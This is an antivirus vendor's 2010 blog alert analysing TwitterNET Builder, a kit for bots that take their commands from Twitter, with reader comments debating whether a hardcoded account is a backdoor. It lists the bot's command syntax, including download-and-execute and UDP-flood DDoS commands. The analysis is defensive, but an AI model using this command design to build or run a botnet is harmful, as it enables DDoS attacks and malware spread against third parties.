Malware City/Blog/

May
14
Filed Under:
ALERTS

Twitter®-Controlled Botnet SDK At Large

14 May 2010
Coordinated DDOS attacks now at hand via mobile phone

Huge armies of zombified computers unanimously executing the commands sent by their master – that’s what comes in the mind of a computer user at the sound of the word “botnet”. Fortunately enough, writing a bot is an extremely tedious task that takes a lot of in-depth programming knowledge, so not everyone can become a botmaster overnight, despite the obvious financial advantages.

BitDefender has released an emergency update to protect against a potential pandemic caused by the emergence of a botnet self-development kit controllable via the popular social media service Twitter®. In order to create their custom bot, an attacker only has to launch the SDK, enter a Twitter username that would act as a command & control center and modify the resulting bot’s name and icon to suit their distribution method.

Twitter Bot.

 

The newly-created bot will constantly interrogate the specified Twitter® profile (available at http://www.twitter.com/[userprofile-name] for posts resembling specially-crafted commands. In order to avoid confusion, all of the six supported commands have to start with a period:

Twitter Interface Bot

  1. The .VISIT command accepts two parameters separated by the * sign, as follows: .VISIT*URL*1 or .VISIT*URL*0. The command would make the bot visit a web page specified in the URL parameter. The latter parameter tells the bot whether to visit the URL in a visible (1) or an invisible (0) window.
  2. The .SAY command only takes one parameter and would initialize the Microsoft Text-To-Speech Engine to read the specific parameter. Example: .SAY*Something to say.

Up until here, the bot seems to be more of a hoax tool than of a dangerous piece of malware. However, things get complicated with the inclusion of the following two commands.

  1. The .DOWNLOAD command takes a URL as the first parameter and either 0 or 1 as the second one: .DOWNLOAD*URL/somefile.exe*0 or .DOWNLOAD*URL/somefile.exe*1. The URL tells the bot where to take the file from, while the numeric parameter tells is if the file should be executed or not when download completes.
  2. The .DDOS*IP*PORT command would trigger an UDP flood attack against the indicated IP on the specified port number (be it computer, router or server), thus taking the criminal game to a whole new level of aggression.

Terminating the tasks:

  1. .STOP ensures that the bots eventually stop the repetitive actions such as visiting web resources or hammering an IP to cause a DDOS condition, and return to a “listening” state.
  2. The .REMOVEALL command tells the bots to disconnect from the Twitter account and stay dormant until the next restart. This command practically eliminates all traffic between the bot and the Web, thus making it less “visible” to network packet monitoring tools such as Wireshark®.

This is, undoubtedly, one of the first attempts at creating an automated bot creation tool to be used in conjunction with a Twitter C&C. However, the overall mood of the TwitterNET Builder, as it is called, is experimental: the creator didn’t spend too much to protect the generated bots from reverse engineering or from detection and termination, but this flaw doesn’t make them less dangerous for the average computer user.

One thing to bear in mind though: a closer look into the file reveals that the wannabe botmaster is not the only one controlling the network. There is a secondary hardcoded Twitter account name called @Korrupt that may pass commands to any bot generated with the tool, regardless of the C & C account specified by the bot’s creator. However, at the moment, this account does not reveal any traces of criminal activity.

Fallback twitter

And even if coordinating a botnet via a Twitter profile has its specific drawbacks (this is a single point-of-failure C&C – once the Twitter account is deleted for abuse, the entire botnet would fall apart the next second), it also has its advantages – a botmaster can unleash a large-scale malware pandemic (by silently downloading and executing malware to all the zombie systems) or a DDOS attack by simply tweeting a single line of text from a mobile phone.

In order to protect customers, BitDefender has added detection for Trojan.TweetBot.A and released a free removal tool available here http://www.malwarecity.com/files/Anti-TweetBot-EN.rar





By Bogdan Botezatu
Bogdan never trusts anything until it is disassembled into small pieces and carefully inspected. The passion for writing and the almost obsessive attention to details are some of his greatest qualities and, at the same time, some of his greatest flaws.

Related

11-05-2010 | Malware Alert: Rootkit-Based Skype Worm Opens Backdoors

10-05-2010 | Windows® 7 Compatibility Checker turns out to be a Trojan

03-05-2010 | Extremely aggressive worm chokes instant messaging

26-04-2010 | The Stubborn Rogue

Comments:

Randolf said on May-18-2010 04:45

Can you clarify the @Korrupt issue? He is actually a friend of mine and though he's a tech writer and evil by nature ;-) he's definitely not master of some kind of bot net...

Bogdan Botezatu said on May-18-2010 05:47

Hello, Randolf. Don't exactly know what clarification the "issue" needs. The @Korrupt account is listed in the control section of any bot created with the tool (see the blue screenshot). We are unsure of the purpose of this addition, especially since the @Korrupt account is clean. However, the issue remains: @Korrupt can, at any time, take over the global botnet created with this tool, and this is a fact. Mentioning the account is not an accusation of any kind, it's merely an observation of whatever happens inside these bots.

Paperghost said on May-18-2010 12:56

Hello there, I think I can answer that question. Some background: I originally wrote about this infection on the 13th:

http://www.theregister.co.uk/2010/05/13/diy_twitter_botnets/

And noticed the twitter account in the code. However, I didn't mention it in the blog entry as I suspected it was an error by the creator. The individual who made the kit in the first place is called Korruptz, and their twitter account was korruptznet. I guessed at the time they'd either mangled their code, or entered an incomplete twitter handle by accident. Given the difference in biographical data between both entities (a quick check of various forums posts, websites and blogs confirms these differences) it rather seems that "incomplete twitter handle entered by accident" would be the best bet. Unfortunate, but not uncommon.

Korrupt said on May-18-2010 14:32

Hi there,
i hadn't understood your post as an accusation, and its a strange feeling to become master of a botnet without further ado :o)
Seriously - i'm as surprised as any other may be in this situation. I contacted BitDefender on the issue, i know someone there personally and may be of assistance in case if the botnet is actually used. I'll keep you informed.
greetz,
Korrupt

Bogdan Botezatu said on May-18-2010 16:29

Hello, Paperghost. I knew about KorruptzNet, but I initially did not want to publish anything based on speculations. My original theory had it that the author hardcoded the name, released the tool to market, and tried to register the Twitter account afterwards. Unfortunately for him, the handle @Korrupt was already taken and had to register the KorruptzNet alias (temporarily suspended). However, there's only one thing that puzzles me: why did the SDK's author persist with this "mistake" in the second version of the SDK (which I'll be writing about soon), although he surely has spotted it in the mean time?

fish said on May-19-2010 16:43

Bogdan, are you sure the `@Korrupt@` string in the binary really leads to a backdoor? At least in the sample I just had a look at, `@Korrupt@` was just the string used as the delimiter of the C

Bogdan Botezatu said on May-20-2010 03:05

@fish: I see no reason for using separators in the overlay section, especially to isolate the sole Twitter ID. However, I've seen the mentioned string repeat itself a couple of times between custom commands in the second version of the TwitterNET.

fish said on May-20-2010 03:11

Sorry, my previous comment was incomplete, due to the fact that the user comment input is not properly escaped in the ajax.js script before being concatenated to form the POST content string.
So, in my post, the ampersand character in the `C-and-C server` term was treated as a application/x-www-form-urlencoded string separator.

Please delete my previous comment - I'll re-post it this afternoon.

fish said on May-20-2010 09:45

My previous comment was incomplete due to a bug in the AJaX comment script. Re-post with the ampersand characters stripped out:

Bogdan, are you sure the `@Korrupt@` string in the binary really leads to a backdoor? At least in the sample I just had a look at, `@Korrupt@` was just the string used as the delimiter of the given C-and-C twitter account name.
The commands are fetched by the getCommands() method from an URI contained in a variable called TwitterURL (most probably due to incomplete obfuscation) which is set by the main form load handler - I posted a (partially de-obfuscated) disassembly of the method found in my sample on pastebin.com: http://pastebin.com/EQvgExUt
I also dumped the obfuscator's method used for string decryption (renamed to obfuscatorClass.getString() in the disassembly) and used it to write an own C-Sharp application which decodes any obfuscated string from the binary - it can be found at http://pastebin.com/8AeakYVe

Using this, I've decoded the string literals used in the load handler (which sets TwitterURL):
-----
$ mono StringDecoder.exe TwitterNet.exe 44b0ba0b
@Korrupt@
$ mono StringDecoder.exe TwitterNet.exe 44b0bbbf
https://twitter.com/
-----

This leads to the fact that the string literal at 0x44b0ba0b, which is used as the delimiter parameter passed to Strings.Split is `@Korrupt@`. In the next line, the string between the first and the second occurrence of `@Korrupt@` (which is the C-and-C account name specified) and the string literal at 0x44b0bbbf (which is `https://twitter.com/`) are concatenated to form the TwitterURL.
Is my sample just different from the one you analyzed?

Bogdan Botezatu said on May-20-2010 16:43

Hello, fish!

The sample I took a look at had no signs of obfuscation, which made me label it as an amateur's work. Everything the bot contained was in plain and was loaded from a file called stub.exe. I looked at your code but it doesn't seem to resemble what I've got. I'll take a second glance at the file in the morning; a pair of fresh eyes can work miracles.

Razz ^,^ said on Jun-22-2010 10:52

I thought you were supposed to be expert reverse engineers yet you dont understand how a File Split works? This wasnt backdoored it was just how the builder worked by splitting the twitter username by '@Korrupt.' Idiots.

Comment on this

Name:

Email:

Website:

Your email adress will not be published.